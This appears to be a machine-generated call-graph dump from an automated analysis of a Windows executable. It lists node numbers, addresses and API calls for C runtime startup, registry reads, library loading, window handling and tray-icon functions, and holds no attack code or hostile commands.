99200->99205 99202 2d106c 99203 2f2f70 __cinit 67 API calls 99202->99203 99204 2d1076 99203->99204 99206 2daacb 99205->99206 99238 2f02eb 99206->99238 99210 2dab12 99211 2e1207 59 API calls 99210->99211 99212 2dab1c 99211->99212 99213 2e1207 59 API calls 99212->99213 99214 2dab26 99213->99214 99215 2e1207 59 API calls 99214->99215 99216 2dab30 99215->99216 99217 2e1207 59 API calls 99216->99217 99218 2dab6e 99217->99218 99219 2e1207 59 API calls 99218->99219 99220 2dac39 99219->99220 99248 2f0588 99220->99248 99224 2dac6b 99225 2e1207 59 API calls 99224->99225 99226 2dac75 99225->99226 99276 2efe2b 99226->99276 99228 2dacbc 99229 2daccc GetStdHandle 99228->99229 99230 2dad18 99229->99230 99231 312f39 99229->99231 99232 2dad20 OleInitialize 99230->99232 99231->99230 99233 312f42 99231->99233 99232->99202 99283 3370f3 64 API calls Mailbox 99233->99283 99235 312f49 99284 3377c2 CreateThread 99235->99284 99237 312f55 CloseHandle 99237->99232 99285 2f03c4 99238->99285 99241 2f03c4 59 API calls 99242 2f032d 99241->99242 99243 2e1207 59 API calls 99242->99243 99244 2f0339 99243->99244 99245 2e1821 59 API calls 99244->99245 99246 2daad1 99245->99246 99247 2f07bb 6 API calls 99246->99247 99247->99210 99249 2e1207 59 API calls 99248->99249 99250 2f0598 99249->99250 99251 2e1207 59 API calls 99250->99251 99252 2f05a0 99251->99252 99292 2e10c3 99252->99292 99255 2e10c3 59 API calls 99256 2f05b0 99255->99256 99257 2e1207 59 API calls 99256->99257 99258 2f05bb 99257->99258 99259 2f0fe6 Mailbox 59 API calls 99258->99259 99260 2dac43 99259->99260 99261 2eff4c 99260->99261 99262 2eff5a 99261->99262 99263 2e1207 59 API calls 99262->99263 99264 2eff65 99263->99264 99265 2e1207 59 API calls 99264->99265 99266 2eff70 99265->99266 99267 2e1207 59 API calls 99266->99267 99268 2eff7b 99267->99268 99269 2e1207 59 API calls 99268->99269 99270 2eff86 99269->99270 99271 2e10c3 59 API calls 99270->99271 99272 2eff91 99271->99272 99273 2f0fe6 Mailbox 59 API calls 99272->99273 99274 2eff98 RegisterWindowMessageW 99273->99274 99274->99224 99277 2efe3b 99276->99277 99278 32620c 99276->99278 99280 2f0fe6 Mailbox 59 API calls 99277->99280 99295 33a12a 59 API calls 99278->99295 99282 2efe43 99280->99282 99281 326217 99282->99228 99283->99235 99284->99237 99296 3377a8 65 API calls 99284->99296 99286 2e1207 59 API calls 99285->99286 99287 2f03cf 99286->99287 99288 2e1207 59 API calls 99287->99288 99289 2f03d7 99288->99289 99290 2e1207 59 API calls 99289->99290 99291 2f0323 99290->99291 99291->99241 99293 2e1207 59 API calls 99292->99293 99294 2e10cb 99293->99294 99294->99255 99295->99281 99297 2f7e83 99298 2f7e8f __lseeki64 99297->99298 99334 2fa038 GetStartupInfoW 99298->99334 99301 2f7eec 99303 2f7ef7 99301->99303 99419 2f7fd3 58 API calls 3 library calls 99301->99419 99302 2f7e94 99336 2f8dac GetProcessHeap 99302->99336 99337 2f9d16 99303->99337 99306 2f7efd 99307 2f7f08 __RTC_Initialize 99306->99307 99420 2f7fd3 58 API calls 3 library calls 99306->99420 99358 2fd802 99307->99358 99310 2f7f17 99311 2f7f23 GetCommandLineW 99310->99311 99421 2f7fd3 58 API calls 3 library calls 99310->99421 99377 305153 GetEnvironmentStringsW 99311->99377 99314 2f7f22 99314->99311 99317 2f7f3d 99318 2f7f48 99317->99318 99422 2f32e5 58 API calls 3 library calls 99317->99422 99387 304f88 99318->99387 99321 2f7f4e 99324 2f7f59 99321->99324 99423 2f32e5 58 API calls 3 library calls 99321->99423 99401 2f331f 99324->99401 99325 2f7f61 99326 2f7f6c __wwincmdln 99325->99326 99424 2f32e5 58 API calls 3 library calls 99325->99424 99407 2e5f8b 99326->99407 99329 2f7f80 99330 2f7f8f 99329->99330 99425 2f3588 58 API calls _doexit 99329->99425 99426 2f3310 58 API calls _doexit 99330->99426 99333 2f7f94 __lseeki64 99335 2fa04e 99334->99335 99335->99302 99336->99301 99427 2f33b7 36 API calls 2 library calls 99337->99427 99339 2f9d1b 99428 2f9f6c InitializeCriticalSectionAndSpinCount __getstream 99339->99428 99341 2f9d20 99342 2f9d24 99341->99342 99430 2f9fba TlsAlloc 99341->99430 99429 2f9d8c 61 API calls 2 library calls 99342->99429 99345 2f9d29 99345->99306 99346 2f9d36 99346->99342 99347 2f9d41 99346->99347 99431 2f8a05 99347->99431 99350 2f9d83 99439 2f9d8c 61 API calls 2 library calls 99350->99439 99353 2f9d88 99353->99306 99354 2f9d62 99354->99350 99355 2f9d68 99354->99355 99438 2f9c63 58 API calls 4 library calls 99355->99438 99357 2f9d70 GetCurrentThreadId 99357->99306 99359 2fd80e __lseeki64 99358->99359 99360 2f9e3b __lock 58 API calls 99359->99360 99361 2fd815 99360->99361 99362 2f8a05 __calloc_crt 58 API calls 99361->99362 99363 2fd826 99362->99363 99364 2fd891 GetStartupInfoW 99363->99364 99365 2fd831 __lseeki64 @_EH4_CallFilterFunc@8 99363->99365 99367 2fd9d5 99364->99367 99369 2fd8a6 99364->99369 99365->99310 99366 2fda9d 99453 2fdaad LeaveCriticalSection _doexit 99366->99453 99367->99366 99371 2fda22 GetStdHandle 99367->99371 99373 2fda35 GetFileType 99367->99373 99452 2fa05b InitializeCriticalSectionAndSpinCount 99367->99452 99369->99367 99370 2f8a05 __calloc_crt 58 API calls 99369->99370 99372 2fd8f4 99369->99372 99370->99369 99371->99367 99372->99367 99374 2fd928 GetFileType 99372->99374 99451 2fa05b InitializeCriticalSectionAndSpinCount 99372->99451 99373->99367 99374->99372 99378 305164 99377->99378 99379 2f7f33 99377->99379 99454 2f8a4d 58 API calls 2 library calls 99378->99454 99383 304d4b GetModuleFileNameW 99379->99383 99381 30518a _memmove 99382 3051a0 FreeEnvironmentStringsW 99381->99382 99382->99379 99384 304d7f _wparse_cmdline 99383->99384 99386 304dbf _wparse_cmdline 99384->99386 99455 2f8a4d 58 API calls 2 library calls 99384->99455 99386->99317 99388 304fa1 __NMSG_WRITE 99387->99388 99389 304f99 99387->99389 99390 2f8a05 __calloc_crt 58 API calls 99388->99390 99389->99321 99391 304fca __NMSG_WRITE 99390->99391 99391->99389 99393 2f8a05 __calloc_crt 58 API calls 99391->99393 99394 305021 99391->99394 99395 305046 99391->99395 99398 30505d 99391->99398 99456 304837 58 API calls __fptostr 99391->99456 99393->99391 99457 2f2f85 99394->99457 99396 2f2f85 _free 58 API calls 99395->99396 99396->99389 99463 2f8ff6 IsProcessorFeaturePresent 99398->99463 99400 305069 99400->99321 99403 2f332b __IsNonwritableInCurrentImage 99401->99403 99487 2fa701 99403->99487 99404 2f3349 __initterm_e 99405 2f2f70 __cinit 67 API calls 99404->99405 99406 2f3368 __cinit __IsNonwritableInCurrentImage 99404->99406 99405->99406 99406->99325 99408 2e5fa5 99407->99408 99418 2e6044 99407->99418 99409 2e5fdf IsThemeActive 99408->99409 99490 2f359c 99409->99490 99413 2e600b 99502 2e5f00 SystemParametersInfoW SystemParametersInfoW 99413->99502 99415 2e6017 99503 2e5240 99415->99503 99417 2e601f SystemParametersInfoW 99417->99418 99418->99329 99419->99303 99420->99307 99421->99314 99425->99330 99426->99333 99427->99339 99428->99341 99429->99345 99430->99346 99434 2f8a0c 99431->99434 99433 2f8a47 99433->99350 99437 2fa016 TlsSetValue 99433->99437 99434->99433 99435 2f8a2a 99434->99435 99440 305426 99434->99440 99435->99433 99435->99434 99448 2fa362 Sleep 99435->99448 99437->99354 99438->99357 99439->99353 99441 305431 99440->99441 99446 30544c 99440->99446 99442 30543d 99441->99442 99441->99446 99449 2f8d58 58 API calls __getptd_noexit 99442->99449 99444 30545c HeapAlloc 99445 305442 99444->99445 99444->99446 99445->99434 99446->99444 99446->99445 99450 2f35d1 DecodePointer 99446->99450 99448->99435 99449->99445 99450->99446 99451->99372 99452->99367 99453->99365 99454->99381 99455->99386 99456->99391 99458 2f2f8e RtlFreeHeap 99457->99458 99459 2f2fb7 __dosmaperr 99457->99459 99458->99459 99460 2f2fa3 99458->99460 99459->99389 99469 2f8d58 58 API calls __getptd_noexit 99460->99469 99462 2f2fa9 GetLastError 99462->99459 99464 2f9001 99463->99464 99470 2f8e89 99464->99470 99468 2f901c 99468->99400 99469->99462 99471 2f8ea3 _memset __call_reportfault 99470->99471 99472 2f8ec3 IsDebuggerPresent 99471->99472 99478 2fa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99472->99478 99475 2f8faa 99477 2fa370 GetCurrentProcess TerminateProcess 99475->99477 99476 2f8f87 __call_reportfault 99479 2fc826 99476->99479 99477->99468 99478->99476 99480 2fc82e 99479->99480 99481 2fc830 IsProcessorFeaturePresent 99479->99481 99480->99475 99483 305b3a 99481->99483 99486 305ae9 5 API calls 2 library calls 99483->99486 99485 305c1d 99485->99475 99486->99485 99488 2fa704 EncodePointer 99487->99488 99488->99488 99489 2fa71e 99488->99489 99489->99404 99491 2f9e3b __lock 58 API calls 99490->99491 99492 2f35a7 DecodePointer EncodePointer 99491->99492 99555 2f9fa5 LeaveCriticalSection 99492->99555 99494 2e6004 99495 2f3604 99494->99495 99496 2f360e 99495->99496 99497 2f3628 99495->99497 99496->99497 99556 2f8d58 58 API calls __getptd_noexit 99496->99556 99497->99413 99499 2f3618 99557 2f8fe6 9 API calls __fptostr 99499->99557 99501 2f3623 99501->99413 99502->99415 99504 2e524d __ftell_nolock 99503->99504 99505 2e1207 59 API calls 99504->99505 99506 2e5258 GetCurrentDirectoryW 99505->99506 99558 2e4ec8 99506->99558 99508 2e527e IsDebuggerPresent 99509 2e528c 99508->99509 99510 320b21 MessageBoxA 99508->99510 99511 320b39 99509->99511 99512 2e52a0 99509->99512 99510->99511 99666 2e314d 59 API calls Mailbox 99511->99666 99626 2e31bf 99512->99626 99515 320b49 99522 320b5f SetCurrentDirectoryW 99515->99522 99520 2e536c Mailbox 99520->99417 99522->99520 99555->99494 99556->99499 99557->99501 99559 2e1207 59 API calls 99558->99559 99560 2e4ede 99559->99560 99675 2e5420 99560->99675 99562 2e4efc 99563 2e19e1 59 API calls 99562->99563 99564 2e4f10 99563->99564 99565 2e1c9c 59 API calls 99564->99565 99566 2e4f1b 99565->99566 99567 2d477a 59 API calls 99566->99567 99568 2e4f27 99567->99568 99569 2e1a36 59 API calls 99568->99569 99570 2e4f34 99569->99570 99571 2d39be 68 API calls 99570->99571 99572 2e4f44 Mailbox 99571->99572 99573 2e1a36 59 API calls 99572->99573 99574 2e4f68 99573->99574 99575 2d39be 68 API calls 99574->99575 99576 2e4f77 Mailbox 99575->99576 99577 2e1207 59 API calls 99576->99577 99578 2e4f94 99577->99578 99689 2e55bc 99578->99689 99581 2f312d _W_store_winword 60 API calls 99582 2e4fae 99581->99582 99583 320a54 99582->99583 99584 2e4fb8 99582->99584 99586 2e55bc 59 API calls 99583->99586 99585 2f312d _W_store_winword 60 API calls 99584->99585 99588 2e4fc3 99585->99588 99587 320a68 99586->99587 99590 2e55bc 59 API calls 99587->99590 99588->99587 99589 2e4fcd 99588->99589 99591 2f312d _W_store_winword 60 API calls 99589->99591 99592 320a84 99590->99592 99593 2e4fd8 99591->99593 99595 2f00cf 61 API calls 99592->99595 99593->99592 99594 2e4fe2 99593->99594 99596 2f312d _W_store_winword 60 API calls 99594->99596 99597 320aa7 99595->99597 99598 2e4fed 99596->99598 99599 2e55bc 59 API calls 99597->99599 99600 2e4ff7 99598->99600 99601 320ad0 99598->99601 99603 320ab3 99599->99603 99604 2e501b 99600->99604 99607 2e1c9c 59 API calls 99600->99607 99602 2e55bc 59 API calls 99601->99602 99605 320aee 99602->99605 99606 2e1c9c 59 API calls 99603->99606 99608 2d47be 59 API calls 99604->99608 99609 2e1c9c 59 API calls 99605->99609 99610 320ac1 99606->99610 99611 2e500e 99607->99611 99612 2e502a 99608->99612 99613 320afc 99609->99613 99614 2e55bc 59 API calls 99610->99614 99615 2e55bc 59 API calls 99611->99615 99616 2d4540 59 API calls 99612->99616 99617 2e55bc 59 API calls 99613->99617 99614->99601 99615->99604 99618 2e5038 99616->99618 99619 320b0b 99617->99619 99620 2d43d0 59 API calls 99618->99620 99619->99619 99623 2e5055 99620->99623 99621 2d477a 59 API calls 99621->99623 99622 2d43d0 59 API calls 99622->99623 99623->99621 99623->99622 99624 2e55bc 59 API calls 99623->99624 99625 2e509b Mailbox 99623->99625 99624->99623 99625->99508 99627 2e31cc __ftell_nolock 99626->99627 99628 320314 _memset 99627->99628 99629 2e31e5 99627->99629 99631 320330 GetOpenFileNameW 99628->99631 99630 2f0284 60 API calls 99629->99630 99632 2e31ee 99630->99632 99633 32037f 99631->99633 99701 2f09c5 99632->99701 99635 2e1821 59 API calls 99633->99635 99637 320394 99635->99637 99637->99637 99639 2e3203 99719 2e278a 99639->99719 99666->99515 99676 2e542d __ftell_nolock 99675->99676 99677 2e1821 59 API calls 99676->99677 99683 2e5590 Mailbox 99676->99683 99679 2e545f 99677->99679 99678 2e1609 59 API calls 99678->99679 99679->99678 99688 2e5495 Mailbox 99679->99688 99680 2e1609 59 API calls 99680->99688 99681 2e5563 99682 2e1a36 59 API calls 99681->99682 99681->99683 99684 2e5584 99682->99684 99683->99562 99686 2e4c94 59 API calls 99684->99686 99685 2e1a36 59 API calls 99685->99688 99686->99683 99688->99680 99688->99681 99688->99683 99688->99685 99695 2e4c94 99688->99695 99690 2e55df 99689->99690 99691 2e55c6 99689->99691 99693 2e1821 59 API calls 99690->99693 99692 2e1c9c 59 API calls 99691->99692 99694 2e4fa0 99692->99694 99693->99694 99694->99581 99696 2e4ca2 99695->99696 99700 2e4cc4 _memmove 99695->99700 99698 2f0fe6 Mailbox 59 API calls 99696->99698 99697 2f0fe6 Mailbox 59 API calls 99699 2e4cd8 99697->99699 99698->99700 99699->99688 99700->99697 99702 301b70 __ftell_nolock 99701->99702 99703 2f09d2 GetLongPathNameW 99702->99703 99704 2e1821 59 API calls 99703->99704 99705 2e31f7 99704->99705 99706 2e2f3d 99705->99706 99707 2e1207 59 API calls 99706->99707 99708 2e2f4f 99707->99708 99709 2f0284 60 API calls 99708->99709 99710 2e2f5a 99709->99710 99711 320177 99710->99711 99712 2e2f65 99710->99712 99717 320191 99711->99717 99759 2e151f 61 API calls 99711->99759 99713 2e4c94 59 API calls 99712->99713 99715 2e2f71 99713->99715 99753 2d1307 99715->99753 99718 2e2f84 Mailbox 99718->99639 99760 2e49c2 99719->99760 99722 31f8d6 99877 339b16 99722->99877 99723 2e49c2 136 API calls 99725 2e27c3 99723->99725 99725->99722 99754 2d1319 99753->99754 99758 2d1338 _memmove 99753->99758 99756 2f0fe6 Mailbox 59 API calls 99754->99756 99755 2f0fe6 Mailbox 59 API calls 99757 2d134f 99755->99757 99756->99758 99757->99718 99758->99755 99759->99711 99944 2e4b29 99760->99944 99765 2e49ed LoadLibraryExW 99954 2e4ade 99765->99954 99766 3208bb 99767 2e4a2f 84 API calls 99766->99767 99770 3208c2 99767->99770 99772 2e4ade 3 API calls 99770->99772 99774 3208ca 99772->99774 99773 2e4a14 99773->99774 99775 2e4a20 99773->99775 99980 2e4ab2 99774->99980 99776 2e4a2f 84 API calls 99775->99776 99778 2e27af 99776->99778 99778->99722 99778->99723 99781 3208f1 99988 2e4a6e 99781->99988 99878 2e4a8c 85 API calls 99877->99878 99993 2e4b77 99944->99993 99947 2e4b77 2 API calls 99950 2e4b50 99947->99950 99948 2e49d4 99951 2f547b 99948->99951 99949 2e4b60 FreeLibrary 99949->99948 99950->99948 99950->99949 99997 2f5490 99951->99997 99953 2e49e1 99953->99765 99953->99766 100109 2e4baa 99954->100109 99956 2e4b03 99959 2e4a05 99956->99959 99960 2e4b15 FreeLibrary 99956->99960 99958 2e4baa 2 API calls 99958->99956 99961 2e48b0 99959->99961 99960->99959 99962 2f0fe6 Mailbox 59 API calls 99961->99962 99963 2e48c5 99962->99963 99964 2e433f 59 API calls 99963->99964 99965 2e48d1 _memmove 99964->99965 99966 2e490c 99965->99966 99967 32080a 99965->99967 99968 2e4a6e 69 API calls 99966->99968 99969 320817 99967->99969 100118 339ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99967->100118 99972 2e4915 99968->99972 100119 339f5e 95 API calls 99969->100119 99973 2e4ab2 74 API calls 99972->99973 99974 320859 99972->99974 99977 2e4a8c 85 API calls 99972->99977 99979 2e49a0 99972->99979 99973->99972 100113 2e4a8c 99974->100113 99977->99972 99979->99773 99981 320945 99980->99981 99982 2e4ac4 99980->99982 100225 2f5802 99982->100225 99985 3396c4 100350 33951a 99985->100350 99987 3396da 99987->99781 99989 2e4a7d 99988->99989 99990 320908 99988->99990 99994 2e4b44 99993->99994 99995 2e4b80 LoadLibraryA 99993->99995 99994->99947 99994->99950 99995->99994 99996 2e4b91 GetProcAddress 99995->99996 99996->99994 99998 2f549c __lseeki64 99997->99998 99999 2f54af 99998->99999 100002 2f54e0 99998->100002 100046 2f8d58 58 API calls __getptd_noexit 99999->100046 100001 2f54b4 100047 2f8fe6 9 API calls __fptostr 100001->100047 100016 300718 100002->100016 100005 2f54e5 100006 2f54ee 100005->100006 100007 2f54fb 100005->100007 100048 2f8d58 58 API calls __getptd_noexit 100006->100048 100009 2f5525 100007->100009 100010 2f5505 100007->100010 100031 300837 100009->100031 100049 2f8d58 58 API calls __getptd_noexit 100010->100049 100013 2f54bf __lseeki64 @_EH4_CallFilterFunc@8 100013->99953 100017 300724 __lseeki64 100016->100017 100018 2f9e3b __lock 58 API calls 100017->100018 100029 300732 100018->100029 100019 3007a6 100051 30082e 100019->100051 100020 3007ad 100080 2f8a4d 58 API calls 2 library calls 100020->100080 100023 3007b4 100023->100019 100081 2fa05b InitializeCriticalSectionAndSpinCount 100023->100081 100024 300823 __lseeki64 100024->100005 100028 3007da EnterCriticalSection 100028->100019 100029->100019 100029->100020 100054 2f9ec3 100029->100054 100078 2f6e7d 59 API calls __lock 100029->100078 100079 2f6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100029->100079 100032 300857 __wopenfile 100031->100032 100033 300871 100032->100033 100045 300a2c 100032->100045 100095 2f39fb 60 API calls 2 library calls 100032->100095 100093 2f8d58 58 API calls __getptd_noexit 100033->100093 100035 300876 100094 2f8fe6 9 API calls __fptostr 100035->100094 100037 300a8f 100090 3087d1 100037->100090 100038 2f5530 100050 2f5552 LeaveCriticalSection LeaveCriticalSection _fseek 100038->100050 100041 300a25 100041->100045 100096 2f39fb 60 API calls 2 library calls 100041->100096 100043 300a44 100043->100045 100097 2f39fb 60 API calls 2 library calls 100043->100097 100045->100033 100045->100037 100046->100001 100047->100013 100048->100013 100049->100013 100050->100013 100082 2f9fa5 LeaveCriticalSection 100051->100082 100053 300835 100053->100024 100055 2f9ecf __lseeki64 100054->100055 100056 2f9ed8 100055->100056 100057 2f9ef0 100055->100057 100083 2fa39b 58 API calls __NMSG_WRITE 100056->100083 100066 2f9f11 __lseeki64 100057->100066 100086 2f8a4d 58 API calls 2 library calls 100057->100086 100059 2f9edd 100084 2fa3f8 58 API calls 6 library calls 100059->100084 100062 2f9f05 100064 2f9f0c 100062->100064 100065 2f9f1b 100062->100065 100063 2f9ee4 100085 2f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100063->100085 100087 2f8d58 58 API calls __getptd_noexit 100064->100087 100067 2f9e3b __lock 58 API calls 100065->100067 100066->100029 100070 2f9f22 100067->100070 100072 2f9f2f 100070->100072 100073 2f9f47 100070->100073 100088 2fa05b InitializeCriticalSectionAndSpinCount 100072->100088 100075 2f2f85 _free 58 API calls 100073->100075 100076 2f9f3b 100075->100076 100089 2f9f63 LeaveCriticalSection _doexit 100076->100089 100078->100029 100079->100029 100080->100023 100081->100028 100082->100053 100083->100059 100084->100063 100086->100062 100087->100066 100088->100076 100089->100066 100098 307fb5 100090->100098 100092 3087ea 100092->100038 100093->100035 100094->100038 100095->100041 100096->100043 100097->100045 100099 307fc1 __lseeki64 100098->100099 100100 307fd7 100099->100100 100102 30800d 100099->100102 100101 2f8d58 __fptostr 58 API calls 100100->100101 100103 307fdc 100101->100103 100105 30807e __wsopen_nolock 109 API calls 100102->100105 100104 2f8fe6 __fptostr 9 API calls 100103->100104 100108 307fe6 __lseeki64 100104->100108 100106 308029 100105->100106 100107 308052 __wsopen_helper LeaveCriticalSection 100106->100107 100107->100108 100108->100092 100110 2e4af7 100109->100110 100111 2e4bb3 LoadLibraryA 100109->100111 100110->99956 100110->99958 100111->100110 100112 2e4bc4 GetProcAddress 100111->100112 100112->100110 100114 2e4a9b 100113->100114 100117 320923 100113->100117 100120 2f5a6d 100114->100120 100118->99969 100119->99972 100121 2f5a79 __lseeki64 100120->100121 100122 2f5a8b 100121->100122 100124 2f5ab1 100121->100124 100151 2f8d58 58 API calls __getptd_noexit 100122->100151 100133 2f6e3e 100124->100133 100134 2f6e4e 100133->100134 100135 2f6e70 EnterCriticalSection 100133->100135 100134->100135 100228 2f581d 100225->100228 100227 2e4ad5 100227->99985 100229 2f5829 __lseeki64 100228->100229 100230 2f583f _memset 100229->100230 100231 2f586c 100229->100231 100232 2f5864 __lseeki64 100229->100232 100255 2f8d58 58 API calls __getptd_noexit 100230->100255 100233 2f6e3e __lock_file 59 API calls 100231->100233 100232->100227 100234 2f5872 100233->100234 100241 2f563d 100234->100241 100237 2f5859 100256 2f8fe6 9 API calls __fptostr 100237->100256 100244 2f5658 _memset 100241->100244 100248 2f5673 100241->100248 100242 2f5663 100346 2f8d58 58 API calls __getptd_noexit 100242->100346 100244->100242 100244->100248 100252 2f56b3 100244->100252 100245 2f5668 100347 2f8fe6 9 API calls __fptostr 100245->100347 100257 2f58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100248->100257 100249 2f57c4 _memset 100349 2f8d58 58 API calls __getptd_noexit 100249->100349 100250 2f4906 __fseek_nolock 58 API calls 100250->100252 100252->100248 100252->100249 100252->100250 100258 30108b 100252->100258 100326 300dd7 100252->100326 100348 300ef8 58 API calls 3 library calls 100252->100348 100255->100237 100256->100232 100257->100232 100259 3010c3 100258->100259 100260 3010ac 100258->100260 100262 3017fb 100259->100262 100267 3010fd 100259->100267 100261 2f8d24 __lseeki64 58 API calls 100260->100261 100263 3010b1 100261->100263 100264 2f8d24 __lseeki64 58 API calls 100262->100264 100266 2f8d58 __fptostr 58 API calls 100263->100266 100265 301800 100264->100265 100306 3010b8 100266->100306 100269 301105 100267->100269 100275 30111c 100267->100275 100271 2f8d24 __lseeki64 58 API calls 100269->100271 100274 301131 100275->100274 100278 30114b 100275->100278 100279 301169 100275->100279 100275->100306 100278->100274 100306->100252 100327 300de2 100326->100327 100331 300df7 100326->100331 100328 2f8d58 __fptostr 58 API calls 100327->100328 100329 300de7 100328->100329 100330 2f8fe6 __fptostr 9 API calls 100329->100330 100338 300df2 100330->100338 100332 300e2c 100331->100332 100333 306214 __getbuf 58 API calls 100331->100333 100331->100338 100334 2f4906 __fseek_nolock 58 API calls 100332->100334 100333->100332 100335 300e40 100334->100335 100338->100252 100346->100245 100347->100248 100348->100252 100349->100245 100353 2f542a GetSystemTimeAsFileTime 100350->100353 100352 339529 100352->99987 100354 2f5458 __aulldiv 100353->100354 100354->100352 100538 2e4d83 100539 2e4dba 100538->100539 100540 2e4e35 100539->100540 100541 2e4dd8 100539->100541 100542 2e4e37 100539->100542 100545 2e4e1a DefWindowProcW 100540->100545 100543 2e4ead PostQuitMessage 100541->100543 100544 2e4de5 100541->100544 100546 3209c2 100542->100546 100547 2e4e3d 100542->100547 100551 2e4e28 100543->100551 100548 320a35 100544->100548 100549 2e4df0 100544->100549 100545->100551 100593 2dc460 10 API calls Mailbox 100546->100593 100552 2e4e65 SetTimer RegisterWindowMessageW 100547->100552 100553 2e4e42 100547->100553 100596 332cce 97 API calls _memset 100548->100596 100554 2e4df8 100549->100554 100555 2e4eb7 100549->100555 100552->100551 100556 2e4e8e CreatePopupMenu 100552->100556 100559 320965 100553->100559 100560 2e4e49 KillTimer 100553->100560 100561 320a1a 100554->100561 100562 2e4e03 100554->100562 100583 2e5b29 100555->100583 100556->100551 100558 3209e9 100594 2dc483 277 API calls Mailbox 100558->100594 100566 32096a 100559->100566 100567 32099e MoveWindow 100559->100567 100568 2e5ac3 Shell_NotifyIconW 100560->100568 100561->100545 100595 328854 59 API calls Mailbox 100561->100595 100569 2e4e0e 100562->100569 100570 2e4e9b 100562->100570 100563 320a47 100563->100545 100563->100551 100571 32096e 100566->100571 100572 32098d SetFocus 100566->100572 100567->100551 100573 2e4e5c 100568->100573 100569->100545 100580 2e5ac3 Shell_NotifyIconW 100569->100580 100591 2e5bd7 107 API calls _memset 100570->100591 100571->100569 100576 320977 100571->100576 100572->100551 100590 2d34e4 DeleteObject DestroyWindow Mailbox 100573->100590 100592 2dc460 10 API calls Mailbox 100576->100592 100578 2e4eab 100578->100551 100581 320a0e 100580->100581 100582 2e59d3 94 API calls 100581->100582 100582->100540 100584 2e5bc2 100583->100584 100585 2e5b40 _memset 100583->100585 100584->100551 100586 2e56f8 87 API calls 100585->100586 100588 2e5b67 100586->100588 100587 2e5bab KillTimer SetTimer 100587->100584 100588->100587 100589 320d6e Shell_NotifyIconW 100588->100589 100589->100587 100590->100551 100591->100578 100592->100551 100593->100558 100594->100569 100595->100540 100596->100563 100597 2d107d 100602 2e2fc5 100597->100602 100599 2d108c 100600 2f2f70 __cinit 67 API calls 100599->100600 100601 2d1096 100600->100601 100603 2e2fd5 __ftell_nolock 100602->100603 100604 2e1207 59 API calls 100603->100604 100605 2e308b 100604->100605 100606 2f00cf 61 API calls 100605->100606 100607 2e3094 100606->100607 100633 2f08c1 100607->100633 100610 2e1900 59 API calls 100611 2e30ad 100610->100611 100612 2e4c94 59 API calls 100611->100612 100613 2e30bc 100612->100613 100614 2e1207 59 API calls 100613->100614 100615 2e30c5 100614->100615 100616 2e19e1 59 API calls 100615->100616 100617 2e30ce RegOpenKeyExW 100616->100617 100618 3201a3 RegQueryValueExW 100617->100618 100622 2e30f0 Mailbox 100617->100622 100619 3201c0 100618->100619 100620 320235 RegCloseKey 100618->100620 100621 2f0fe6 Mailbox 59 API calls 100619->100621 100620->100622 100632 320247 _wcscat Mailbox __NMSG_WRITE 100620->100632 100623 3201d9 100621->100623 100622->100599 100624 2e433f 59 API calls 100623->100624 100625 3201e4 RegQueryValueExW 100624->100625 100626 320201 100625->100626 100629 32021b 100625->100629 100628 2e1821 59 API calls 100626->100628 100627 2e1609 59 API calls 100627->100632 100628->100629 100629->100620 100630 2e1a36 59 API calls 100630->100632 100631 2e4c94 59 API calls 100631->100632 100632->100622 100632->100627 100632->100630 100632->100631 100634 301b70 __ftell_nolock 100633->100634 100635 2f08ce GetFullPathNameW 100634->100635 100636 2f08f0 100635->100636 100637 2e1821 59 API calls 100636->100637 100638 2e309f 100637->100638 100638->100610 100639 312b43 100643 326b59 100639->100643 100641 312b4e 100642 326b59 85 API calls 100641->100642 100642->100641 100649 326b93 100643->100649 100651 326b66 100643->100651 100644 326b95 100655 2d4818 84 API calls Mailbox 100644->100655 100646 326b9a 100647 2d4d37 84 API calls 100646->100647 100648 326ba1 100647->100648 100650 2e17e0 59 API calls 100648->100650 100649->100641 100650->100649 100651->100644 100651->100646 100651->100649 100652 326b8d 100651->100652 100654 2d4aa0 59 API calls _wcsstr 100652->100654 100654->100649 100655->100646 100656 30e463 100668 2d373a 100656->100668 100658 30e479 100659 30e4fa 100658->100659 100660 30e48f 100658->100660 100662 2db020 277 API calls 100659->100662 100677 2d5376 60 API calls 100660->100677 100667 30e4ee Mailbox 100662->100667 100664 30e4ce 100664->100667 100678 33890a 59 API calls Mailbox 100664->100678 100665 30f046 Mailbox 100667->100665 100679 33a48d 89 API calls 4 library calls 100667->100679 100669 2d3758 100668->100669 100670 2d3746 100668->100670 100672 2d375e 100669->100672 100673 2d3787 100669->100673 100671 2d523c 59 API calls 100670->100671 100676 2d3750 100671->100676 100675 2f0fe6 Mailbox 59 API calls 100672->100675 100674 2d523c 59 API calls 100673->100674 100674->100676 100675->100676 100676->100658 100677->100664 100678->100667 100679->100665 100680 2d1055 100685 2d2a19 100680->100685 100683 2f2f70 __cinit 67 API calls 100684 2d1064 100683->100684 100686 2e1207 59 API calls 100685->100686 100687 2d2a87 100686->100687 100692 2d1256 100687->100692 100689 2d2b24 100690 2d105a 100689->100690 100695 2d13f8 59 API calls 2 library calls 100689->100695 100690->100683 100696 2d1284 100692->100696 100695->100689 100697 2d1291 100696->100697 100698 2d1275 100696->100698 100697->100698 100699 2d1298 RegOpenKeyExW 100697->100699 100698->100689 100699->100698 100700 2d12b2 RegQueryValueExW 100699->100700 100701 2d12e8 RegCloseKey 100700->100701 100702 2d12d3 100700->100702 100701->100698 100702->100701 100703 2d5ff5 100726 2d5ede Mailbox _memmove 100703->100726 100704 2f0fe6 59 API calls Mailbox 100704->100726 100705 2d6a9b 100771 2da9de 277 API calls 100705->100771 100707 2d53b0 277 API calls 100707->100726 100708 30eff9 100783 2d5190 59 API calls Mailbox 100708->100783 100710 30f007 100784 33a48d 89 API calls 4 library calls 100710->100784 100714 30efeb 100760 2d5569 Mailbox 100714->100760 100782 326cf1 59 API calls Mailbox 100714->100782 100715 2d60e5 100716 30e137 100715->100716 100722 2d63bd Mailbox 100715->100722 100729 2d6abc 100715->100729 100736 2d6152 Mailbox 100715->100736 100716->100722 100772 327aad 59 API calls 100716->100772 100717 2e1c9c 59 API calls 100717->100726 100720 2f0fe6 Mailbox 59 API calls 100725 2d63d1 100720->100725 100721 2e1a36 59 API calls 100721->100726 100722->100720 100734 2d6426 100722->100734 100723 2d523c 59 API calls 100723->100726 100724 34c355 277 API calls 100724->100726 